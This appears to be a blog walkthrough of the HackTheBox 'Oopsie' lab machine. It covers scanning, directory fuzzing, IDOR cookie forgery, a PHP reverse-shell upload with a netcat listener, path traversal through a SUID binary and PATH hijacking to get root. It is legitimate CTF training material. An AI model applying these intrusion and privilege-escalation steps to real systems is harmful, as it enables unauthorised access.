Open in app

Sign in

Write

Sign in

Oopsie — HacktheBox Writeup ( getting root flag without actually being root )

Mayank Garg
8 min readApr 24, 2021

Introduction:

Oopsie is an easy box on HacktheBox platform.

Firstly, connect to the HacktheBox VPN and jump right in. ( IP of the target box is 10.10.10.28 )

Enumeration:

Let’s Enumerate, because enumeration is the key. I personally use Rustscan because it is much faster than Nmap. You can download Rustscan easily by using the apt package manager of Linux. Fire the command apt install rustscan in the terminal and the tool will be downloaded and installed for you ( use sudo if you are not the root user ).

Get a cheat-sheet or complete the Rustscan room on TryHackMe to know how to use Rustscan at its best potential. The command I used was — rustscan -a 10.10.10.28 --range 1–65535 -- -sC -sV -O -oN file.txt.

  • -a is for specifying the target.
  • — range specifies the range of port to be scanned. Here we are scanning all the ports.
  • means that the rest arguments/flags/switches will be the Nmap switches.
  • -sC is to include the default scripts while scanning for the ports. It helps to identify the known vulnerabilities while scanning.
  • -sV gives the version of the services running.
  • -O is for OS detection.
  • -oN is to write the output in a file ( for future reference ).

So, the results of Rustscan / Nmap will show you that port 22, 80 are open. Start your web-browser and type in the IP of the target box.

The second thing I do is Directory Bruteforcing. For this, nothing is better than FFUF. I suggest to watch this video by Codingo to understand how to use FFUF in a better way- https://www.youtube.com/watch?v=iLFkxAmwXF0 . The command for the same is ffuf -u http://10.10.10.28/FUZZ -recursion -w location/of/wordlist.txt | tee ffuf.log`

  • -u is for specifying the target box.
  • -recursion means that if ffuf finds a valid directory, it will fuzz further that found directory ( one level up ).
  • -w is for defining the wordlist to use for fuzzing.
  • | is to take the output of the first command as the input of the second command. Here, we will take the output of the ffuf command and we’ll do something with the generated output in tee command.
  • tee command generates the output on the terminal as well as save the output in the specified file.

The required output of FFUF is — /cdn-cgi/login . Visit this endpoint by entering http://10.10.10.28/cdn-cgi/login. This greets us with a login page as shown:

Currently I did not have any username so I tried bruteforcing the password with the username as admin and administrator, but had no luck. I visited the homepage again and looked for something that could be useful, visited different end-points looking for anything to be useful but again, no luck. So, I looked at a couple of writeups ( yes, I looked at a writeup because I am also learning ) and found that the author has used the password ‘from the last machine’. I don’t know which last machine they were talking about, but I used them. Use admin:MEGACORP_4dm1n!! as the login credentials.

Here, the upload page is further restricted to the ‘super-admin’. As the page name says, we can upload some files to it. We can try to upload reverse shell files to get a shell back, if possible. Till then, we have to find a way to become the super-admin.

Visit the Accounts page. The URL contains a parameter id. Try to fuzz it with BurpSuite. I use a Firefox extension- FoxyProxy, to easily setup the interception with BurpSuite.

Intercept the request to the Accounts page, and use the Burp-Intruder to fuzz the id parameter. Set the values between 1 and 200. ( do it 50 for faster results ).

The results show some users and their access-ID:

Edit the URL and the value of id parameter as 30 and the results will as as shown above.

Becoming super-admin on the application:

Now edit the cookies and replace the accessid with 86575 and name as super-admin. Now we can easily visit the Uploads page.

Gaining shell ( Initial Foothold ) :

Upload the PHP reverse shell as the target page is using PHP at their back-end. ( You can use an extension called wappalyzer to know what technologies a particular web application is using. ) You can look at pentest-monkey reverse shells. Edit the ip and port values ( changing only the ip value to the target IP will work ).

Upload it with any name you want.

The reverse shell has been uploaded successfully. Now we have to start the netcat-listener and trigger the uploaded reverse-shell.

Start the netcat listener on the same port with which you have uploaded the shell. Here it is 443'. Fire the command nc -nlvp 443in the terminal.

Now to trigger the reverse shell, we will use curl command.

I have stabilized the shell using Python. Stabilizing the shell, gives you the power to use auto-complete using tab, Ctrl+c won’t kill your shell, etc. You can also set the size of the reverse shell as your stty shell, by using stty rows 39 && stty cols 173. 39 and 173 is the size of my terminal. You can see yours by typing stty size in your own terminal.

Parallel-Escalation ( becoming user `robert` ) :

There is a user as robert so we must try to become that user so that we can see what else we can do in this box. There was a page as /cdn-cgi/login in the website, so visit the same page in the shell. There is a database file db.php under /var/www/html/cdn-cgi/login/ directory, which has the credentials for the robert user. Switch to that user using su command. Now we are the user robert.

Reading the root flag:

Currently we are the user robert.

Run the command id. We can see that robert is a member of a group bugtracker.

Now we have to find the files robert can access which belongs to this group. Type the command find / -type f -group bugtracker 2> /dev/null. Let’s understand what this command is doing.

  • find is the tool which helps to find files and directories.
  • / here is specifying that where to look for the files. / means to look in the root file, everywhere.
  • -type f means that what we are looking for. Is it a file or a directory. d means to search for directory.
  • -group means that we are looking for files which belong to the specified group, here bugtracker.
  • 2> /dev/null means that if this command generates any error, then put that garbage in the /dev/null file. Error can be not being able to access a directory / file because we don’t permission to.

The output of this command shows that there is a SUID binary. If you don’t know what SUID binaries, I’ll tell you. SUID binaries are the binaries which have SUID permissions and these permissions let anyone run that binary with the permission of its owner. And the owner of bugtracker is root. So if we run this file, this should run with the root privileges.

Run this binary, it asks for some ‘bug id’:

Enter any value to see its behavior.

The values 1, 2 and 3 returns the content of some files which we don’t know yet. Try entering some big number:

This reveals that this binary is printing out the content of files which are under /root/reports directory.

PS: we are not able to enter into the root directory, but still can read the file which are under root directory because this binary is running with the root privileges.

Now its time to get the root flag without being root user:

We can traverse one-level up, then we will be into the root directory and the root flag is under the root directory. Since this binary prints the content of a file, we can enter the name of the root.txt file to get its content.

So, the final payload will be ../root.txt, which will act like cat /root/reports/../root.txt ( cat /root/root.txt ). Enter the payload and you will get your root flag.

Becoming root user:

But just reading the root flag isn’t our goal, being the root user is.
So, lets escalate to root.

Bugtracker binary file is using cat command, so we can gain root by exploiting the PATH variable.
PATH variable has directory specified which has binaries for all the commands we use in the terminal.

TIP:
If any SUID binary is there, using some basic bash commands like — ps , ls , cat , etc., we can specify our own PATH variable destination. Set the command imitation and we can set what a particular command to do what we want rather than what it is made to do.

What’s happening here is, I have changed what the cat command will do. I have made the cat command to execute a shell, and since this is a binary with SUID permissions, the shell which we will get will be with root privileges.

OOPSIE HAS BEEN PWNED!

Hackthebox
Hackthebox Writeup
Hacking
Ctf
Keep Learning

--

--

Mayank Garg

Written by Mayank Garg

46 Followers

Penetration Tester | Application Security | Bug Hunter | CEH v11 (Master)

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams